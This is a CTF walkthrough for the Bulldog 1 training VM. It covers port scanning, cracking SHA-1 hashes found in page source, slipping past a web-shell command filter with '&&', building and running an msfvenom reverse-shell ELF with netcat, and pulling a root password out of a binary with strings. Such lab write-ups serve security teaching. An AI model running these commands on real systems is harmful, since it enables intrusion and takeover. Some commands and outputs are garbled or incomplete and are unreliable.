Bulldog 1: CTF walkthrough


Name: Bulldog 1

Date of Release: 28 Aug 2017

Author: Nick Frichette

Series: Bulldog

Note, this VM don’t work with VMWare workstation/Fusion, that’s why after few tries I decided to install VirtualBox (ew, disgusting).


First of all, we need to find the IP address of the VM, we can use netdiscover or arp-scan.


Now, we can scan the target in order to find which services are running inside this virtual machine.

For that, I use the well known network scanner nmap.

[email protected]:~/Desktop# nmap -T5 -A -O --reason -p-
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-08 15:14 CEST

Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for pc-240.home (
Host is up, received arp-response (0.00061s latency).
Not shown: 65185 closed ports, 347 filtered ports
Reason: 65185 resets and 347 no-responses
23/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|_  256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
80/tcp   open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.61 ms pc-240.home (

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.84 seconds
[email protected]:~/Desktop#

Two interesting service are running, an Python HTTP server (WSGIServer) maybe for a Django web application, and an SSH service (OpenSSH 7.2p2).

Now, we will focus our research in this web site.

Website Analyse

The index of the web site don’t give use useful information, except the name of one employee. I decided to actively enumerate the target with a tool used to brute-force URL(s) called gobuster.


The /admin/ and the /dev/ directories sounds interesting.

The admin directory is a login form and after some research I didn’t found vulnerabilities, so, I moved into the second directory.

In the index of the second directory we can find an explication of the project and how the new team is structured and a web-shell, who is inconveniently, usable only for logged user.At this point, I knew I had to find credentials in order to to log in the admin panel and then use the web-shell. After few tries and without success, I knew I had missed something.Yep, I missed something called the source code.

The index of the /dev/ directory has more things than expected, SHA-1 password.

source code

I managed to find the plain text of two password:

Hash (SHA-1) PLaintext
ddf45997a7e18a25ad5f5cf222da64814dd060d5 bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e bulldoglover

We log into admin panel with one of this password and then we will be able to use the web shell.

web shell

Bypassing Command Restriction

At first look we can only use six commands: ifconfig, ls, echo, pwd, cat and rm. Moreover, we can’t use semicolon.

We can’t use semicolon, but maybe if I use an ampersand that will work. And yes that works and that allow use to execute any commands we want on the targeted server.

command filter

We can remotely execute arbitrary code, it’s just a question of second before we can get a reverse shell.

We generate a malicious ELF file with msfvenom:

[email protected]:~/Desktop# msfvenom --platform linux -p linux/x86/shell_reverse_tcp LPORT=1337 LHOST= -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: rshell

We send the malicious file into the targeted server:

#Web shell
ls && nc -lp 1337 > /tmp/rshell

[email protected]:~/Desktop# nc -nvv 192;168.1.41 1337 < rshell

send shell

We change the permission of the file:

#Web shell
ls && chmod 777 /tmp/rshell

Finally, we can execute the reverse shell and then spawn a pseudo TTY:

[email protected]:~/Desktop# nc -lnvvp 1337

#Web shell
ls && /tmp/rshell

reverse shell

Privilege Escalation

We have a low privilege shell, now, our job is to find a way to gain an root access to this server. After few minutes I found an hidden directory inside the bulldogadmin home folder:

[email protected]:/home/$ cd buldogadmin/.hiddendirectory

In this directory we have two things an ASCII file and an x64 ELF binary:

[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ file customPermissionApp           
pile customPermissionAp 
customPermissionApp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c9f2333253302d74eff3da59653f82d28f9eb36f, not stripped
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ 
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ file note
file note
note: ASCII text, with very long lines
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$

The first thing that I try with this ELF file is to search for any kind of strings that I can found inside the compiled binary and fortunately for us, this ELF file contain a password:

[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
<gadmin/.hiddenadmindirectory$ strings customPermissionApp                   
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$

The password is: SUPERultimatePASSWORDyouCANTget